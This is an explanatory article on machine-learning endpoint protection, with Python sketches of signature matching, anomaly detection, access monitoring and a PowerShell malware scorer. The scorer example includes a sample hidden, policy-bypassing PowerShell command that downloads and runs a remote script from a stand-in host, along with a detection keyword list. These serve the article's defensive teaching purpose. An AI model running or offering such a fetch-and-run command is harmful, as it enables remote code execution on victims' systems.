AI protects against malware

For readers in a hurry

Modern endpoint protection uses machine learning to detect suspicious behavioral patterns that indicate misuse or malware.
This dynamic protection against novel threats complements static protection, which identifies malware based on its known fingerprints (signatures).
Machine learning is also used to continuously monitor user behavior, identify attacks based on that behavior, and subsequently remediate their causes and effects.
Effective endpoint protection requires self-adapting software that reliably identifies novel threats and initiates appropriate measures.

A tip for trying it out

If you want a great introduction to Large Language Models (LLMs), which are used, among other things, to analyze malware in PowerShell scripts, you should watch this one-hour video by Andrej Karpathy. It covers almost every aspect of generative AI and LLMs and illustrates them with concrete examples. Security is covered as well. A must-watch for every tech-savvy AI enthusiast.

The dynamics of ML

Classic virus scanners and malware detection programs rely on so-called signature detection: the scanner searches files for byte sequences known to belong to a specific virus so that it can then isolate the infected file.

However, this has the disadvantage that the malware must already be known to the scanner. Furthermore, resourceful malware developers can easily modify their code again and again so that its signature changes and the scanner fails: a game of cat and mouse.
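The weakness of signature detection can be shown in a few lines. The following is a minimal sketch, not the implementation of any real scanner: the signature database, the byte pattern, and the sample payloads are invented for illustration. It checks a file against a hash signature and a byte-sequence signature, then shows that changing a single byte defeats both.

```python
import hashlib

# Hypothetical signature database: SHA-256 digests of known-malicious files.
KNOWN_BAD_HASHES = {
    hashlib.sha256(b"EVIL_PAYLOAD_v1").hexdigest(),
}

# Hypothetical byte-sequence signatures extracted from known malware.
KNOWN_BAD_PATTERNS = [b"EVIL_PAYLOAD"]


def matches_hash_signature(data: bytes) -> bool:
    """True if the whole file matches a known-bad digest."""
    return hashlib.sha256(data).hexdigest() in KNOWN_BAD_HASHES


def matches_byte_signature(data: bytes) -> bool:
    """True if the file contains any known-bad byte sequence."""
    return any(pattern in data for pattern in KNOWN_BAD_PATTERNS)


original = b"EVIL_PAYLOAD_v1"
variant = b"EVIL_PAYL0AD_v1"  # one byte changed by the malware author

print(matches_hash_signature(original), matches_byte_signature(original))  # True True
print(matches_hash_signature(variant), matches_byte_signature(variant))    # False False
```

The variant behaves the same as the original from the attacker's point of view, yet neither signature matches any more. This is the gap that behavior-based detection tries to close.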

Modern endpoint protection therefore relies on AI mechanisms, specifically machine learning, where the security software observes all program processes and automatically derives patterns from them to detect anomalies. Such anomalies can include:

Suspicious Wi-Fi access points
New user accounts with high privilege levels
Attempts to lower security levels on the PC
Data exfiltration attempts to malicious IP addresses
Suspicious patterns in network traffic
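How "deriving patterns" and "detecting anomalies" fit together can be sketched with a deliberately simple statistical baseline. This is an assumption-laden illustration, not how any particular product works: real endpoint protection uses far richer models, and the metric (outbound kilobytes per minute), the sample values, and the threshold are invented here.

```python
from statistics import mean, stdev


def is_anomalous(baseline: list[float], observed: float, threshold: float = 3.0) -> bool:
    """Flag a value that lies more than `threshold` standard deviations from the baseline mean."""
    mu = mean(baseline)
    sigma = stdev(baseline)
    if sigma == 0:
        # A perfectly constant baseline: any deviation counts as anomalous.
        return observed != mu
    return abs(observed - mu) / sigma > threshold


# Hypothetical learned baseline: outbound traffic of one process in KB per minute.
baseline_kb = [120, 135, 110, 128, 140, 125, 118, 132]

print(is_anomalous(baseline_kb, 130))   # False: within the normal range
print(is_anomalous(baseline_kb, 5000))  # True: possible data exfiltration
```

The point of the sketch is that nothing about the malware itself needs to be known in advance; only the deviation from learned normal behavior matters.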

"Behavioral ML"—also known as UEBA (User and Entity Behavior Analytics)—moves in the same direction by focusing increasingly on user behavior, e.g., does a user suddenly try to open files they do not have access to?

If such suspicious behavior is detected, the security software triggers an alert.
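The file-access example can be turned into a small sketch. It is a rule-based stand-in for UEBA, which in practice learns a per-user baseline instead of reading a fixed permission table. The class name `AccessMonitor`, the permission table, and the threshold of three denied attempts are assumptions made for this illustration.

```python
from collections import defaultdict


class AccessMonitor:
    """Counts accesses outside a user's permissions and signals when to alert."""

    def __init__(self, permissions: dict[str, set[str]], max_denied: int = 3):
        self.permissions = permissions
        self.max_denied = max_denied
        self.denied_counts: dict[str, int] = defaultdict(int)

    def record_access(self, user: str, path: str) -> bool:
        """Record one access attempt; return True if an alert should be raised."""
        if path in self.permissions.get(user, set()):
            return False  # permitted access, nothing suspicious
        self.denied_counts[user] += 1
        return self.denied_counts[user] >= self.max_denied


# Hypothetical permission table.
monitor = AccessMonitor({"alice": {"/hr/handbook.pdf"}})

events = [
    ("alice", "/hr/handbook.pdf"),
    ("alice", "/finance/payroll.xlsx"),
    ("alice", "/finance/budget.xlsx"),
    ("alice", "/it/passwords.txt"),
]
alerts = [monitor.record_access(user, path) for user, path in events]
print(alerts)  # [False, False, False, True]
```

A single denied access is usually a mistake; a sudden series of them is the kind of behavior change that warrants an alert.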

The protective hand

Machine learning is also used once a threat or an actual attack has occurred. For example, leading endpoint protection software such as CrowdStrike not only attempts to detect malware early but also identifies its root cause and suggests remediation steps.

Furthermore, AI algorithms are used to track down modified malware signatures that would otherwise go unnoticed. Even malware without a signature is detected based on its conspicuous behavior—for example, if it attempts to bypass security mechanisms.

To avoid reinventing the wheel, CrowdStrike draws on a multitude of sources, which it combines to further train and refine its own ML models. After all, effective protection against malware is a continuous battle in which standing still regularly leads to problems and, ultimately, defeat.

Example: Zero-day exploit

An example illustrates how CrowdStrike uses AI. We have chosen the dreaded zero-day exploit, an attack on a vulnerability for which no patch exists yet. No ready-made remedy is available for such an exploit, even after it has been discovered; only the complete elimination of the vulnerability solves the problem.

How does CrowdStrike handle this?

A malware author creates new malware and modifies it to bypass signature-based detection. The malware author then publishes the malware on the internet, where their victims encounter it.
Signature-based malware scanners are unable to recognize the new malware because they do not have the malware's signature in their database. However, CrowdStrike's ML models are able to recognize the new malware because they have been trained on a massive dataset of known malware signatures, including signatures that have been modified to bypass conventional signature-based detection.
Furthermore, CrowdStrike's behavioral analysis is able to detect the new malware because it reveals its suspicious behavior, e.g., attempting to access sensitive data or disabling security controls.
Finally, CrowdStrike's threat intelligence can detect the new malware because CrowdStrike collects and analyzes threat data from a variety of sources. CrowdStrike uses this information to update its ML models and detection rules.

In this way, CrowdStrike uses AI/ML in a combination of measures and sources to detect zero-day exploits as reliably as possible—even when they are novel.
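The idea of combining several detection layers can be sketched as follows. To be clear, this is not CrowdStrike's actual logic, which is not public in this form. The `Evidence` fields, the weights, and the thresholds are all hypothetical and only show how independent signals might be merged into one verdict.

```python
from dataclasses import dataclass


@dataclass
class Evidence:
    ml_score: float             # 0..1, output of a hypothetical ML classifier
    behavior_flags: int         # number of suspicious behaviors observed
    on_threat_intel_list: bool  # file hash or contacted IP appears in a threat feed


def verdict(evidence: Evidence) -> str:
    """Merge the three layers into 'allow', 'alert', or 'block' (illustrative weights)."""
    if evidence.on_threat_intel_list:
        return "block"  # a confirmed intelligence hit is decisive on its own
    # Each behavior flag adds weight, capped so flags alone cannot dominate.
    score = evidence.ml_score + 0.25 * min(evidence.behavior_flags, 2)
    if score >= 0.8:
        return "block"
    if score >= 0.5:
        return "alert"
    return "allow"


print(verdict(Evidence(ml_score=0.1, behavior_flags=0, on_threat_intel_list=False)))  # allow
print(verdict(Evidence(ml_score=0.4, behavior_flags=1, on_threat_intel_list=False)))  # alert
print(verdict(Evidence(ml_score=0.6, behavior_flags=2, on_threat_intel_list=False)))  # block
```

In the second case, neither the ML score nor the single behavior flag would be enough on its own, but together they cross the alert threshold. That is the benefit of layering for novel malware.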

Example: PowerShell

PowerShell, which is popular and very powerful on Windows, is also frequently used by attackers to bring malware into companies. This is where deep learning models come into play: they analyze the attacker's script code and flag it as malicious.

Using Deep Learning models, the most important code segments are automatically extracted from PowerShell scripts.
The AI analyzes the extracted code segments to identify malicious code flows.
The AI compares the code logic with a database of known malicious and benign PowerShell scripts.
If the AI detects malicious code logic, it generates an alert.
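The four steps above can be mimicked with a much simpler technique. The sketch below swaps the deep learning model for a hand-weighted keyword score, so it shows the shape of the pipeline (extract, analyze, compare, alert) rather than the model itself. The token names are real PowerShell constructs that often appear in malicious scripts, but the weights and the threshold are invented for illustration.

```python
import re

# Hypothetical weights for constructs often seen in malicious PowerShell.
SUSPICIOUS_TOKENS = {
    "invoke-expression": 2.0,
    "iex": 2.0,
    "downloadstring": 2.0,
    "frombase64string": 1.5,
    "-encodedcommand": 2.0,
    "bypass": 1.0,
    "hidden": 1.0,
}

# Matches words such as Get-ChildItem, -EncodedCommand, or DownloadString.
TOKEN_RE = re.compile(r"-?[A-Za-z][A-Za-z0-9]*(?:-[A-Za-z0-9]+)*")


def extract_tokens(script: str) -> list[str]:
    """Step 1: pull candidate code tokens out of the script, lowercased."""
    return [token.lower() for token in TOKEN_RE.findall(script)]


def score_script(script: str) -> float:
    """Steps 2 and 3: compare the tokens with the indicator table and sum the weights."""
    seen = set(extract_tokens(script))
    return sum(weight for token, weight in SUSPICIOUS_TOKENS.items() if token in seen)


def should_alert(script: str, threshold: float = 3.0) -> bool:
    """Step 4: raise an alert when the score reaches the threshold."""
    return score_script(script) >= threshold


benign = "Get-ChildItem -Path C:\\Logs | Sort-Object Length"
malicious = (
    "powershell -WindowStyle Hidden -ExecutionPolicy Bypass "
    "-Command \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/a.ps1')\""
)

print(should_alert(benign))     # False
print(should_alert(malicious))  # True
```

A keyword list like this is easy to evade through obfuscation, which is one reason a learned model that looks at code flow rather than fixed strings is used in practice.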

Without artificial intelligence, it will be difficult to fend off the threats from the internet. For this reason, it is essential to understand how the security software used in your own company works.